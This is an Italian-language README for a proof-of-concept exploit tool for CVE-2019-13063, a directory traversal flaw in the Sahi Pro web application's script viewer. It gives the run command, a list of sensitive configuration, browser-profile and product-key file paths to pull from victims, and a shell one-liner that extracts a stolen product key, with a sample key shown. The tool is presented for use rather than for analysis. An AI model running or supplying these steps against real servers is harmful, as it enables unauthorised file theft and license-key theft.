
Strumento proof of concept per sfruttare la vulnerabilità di directory traversal e inclusione di file locale presente nell'applicazione web Sahi-pro CVE-2019-13063
È stato scoperto un problema nell'applicazione web Sahi-pro script manager: esiste una vulnerabilità di directory traversal e file traversal che risiede nel parametro ?script=, presente nella pagina /Script_view dell'applicazione web Sahi-pro. Un attaccante può inviare un URL appositamente creato per recuperare e rubare file sensibili dalla vittima.
Questo è un tool proof of concept per sfruttare la vulnerabilità di directory traversal e file traversal presente nell'applicazione web Sahi-pro.
Impatto: All'interno del software applicativo web Sahi-pro è presente una vulnerabilità di directory e file traversal che provoca la perdita di informazioni sensibili dall'applicazione, oppure può essere utilizzata per prelevare file direttamente dal sistema.
Il parametro ?script= sulla pagina script_view è suscettibile a file e directory traversal per elencare il contenuto dei file.
Eseguilo così:
$ python3 CVE-2019-13063-POC.py --url http://example:[REDATTO]
Questo scaricherà la product key dell'applicazione.
Specifica l'URL completo, inclusi il file che desideri scaricare, aggiunto dopo il parametro vulnerabile ?script=.
usage: CVE-2019-13063-POC.py [-h] [--url URL]
optional arguments:
-h, --help show this help message and exit
--url URL Specify the vulnerable URL
File delle proprietà utente di Sahi - \sahi_pro\userdata\config\userdata.properties
Profilo dati di Sahi - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
File delle proprietà di Sahi - \sahi_pro\config\sahi.properties
Posizione della product key di Sahi - \config\productkey.txt
Questo script tenta di scaricare l'intera pagina; puoi facilmente estrarre il contenuto desiderato dalla pagina, poiché è compreso tra i parametri HTML unici <ol><li> con un semplice one-liner in bash.
Esempio per estrarre la product key:
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1
1a79a4d60de6718e8e5b326e338ae533